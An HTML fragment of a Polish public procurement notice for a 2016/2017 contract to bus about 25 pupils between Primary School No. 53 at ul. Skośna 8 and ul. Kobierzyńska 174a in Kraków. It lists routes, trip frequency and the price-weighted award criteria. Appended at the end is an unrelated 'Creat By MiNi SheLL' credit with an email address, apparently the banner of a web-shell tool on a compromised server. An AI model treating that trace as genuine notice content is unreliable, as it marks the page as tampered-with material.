<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie w roku szkolnym 2016/2017  usługi przewozu dzieci  pomiędzy Szkołą Podstawową nr 53 w Krakowie przy ul. Skośnej 8 a miejscem prowadzenia zajęć szkolnych przy ul. Kobierzyńskiej 174a w Krakowie  w dni powszednie od poniedziałku do piątku, z wyłączeniem dni wolnych od zajęć szkolnych (ferie, święta, itp) środkami transportu sprawnymi technicznie i przystosowanymi do przewozów pasażerskich wraz z kierowcami i opiekunami. 
Oznaczenie trasy i częstotliwości przejazdów: 
 - Od poniedziałku do piątku codziennie w godzinach południowych 1 kurs z trasą przewozu: ul. Skośna 8 (Szkoła Podstawowa nr 53) - ul. Kobierzyńska 174a (miejsce prowadzenia zajęć przez Szkołę Podstawową nr 53), a następnie 1 kurs z trasą przewozu: ul. Kobierzyńska 174a ( miejsce prowadzenia zajęć przez Szkołę Podstawową nr 53) - ul. Skośna 8 (Szkoła Podstawowa nr 53).
 - dwa razy w tygodniu: 1 kurs ranny: ul. Skośna 8 (Szkoła Podstawowa nr 53) - ul. Kobierzyńska 174a (miejsce prowadzenia zajęć przez Szkołę Podstawową nr 53)
 - dwa razy w tygodniu: 1 kurs popołudniowy: ul. Kobierzyńska 174a (miejsce prowadzenia zajęć przez Szkołę Podstawową nr 53) - ul. Skośna 8 (Szkoła Podstawowa nr 53).
Planowana liczba przewożonych uczniów podczas każdego kursu: 25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zastępczego środka transportu - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com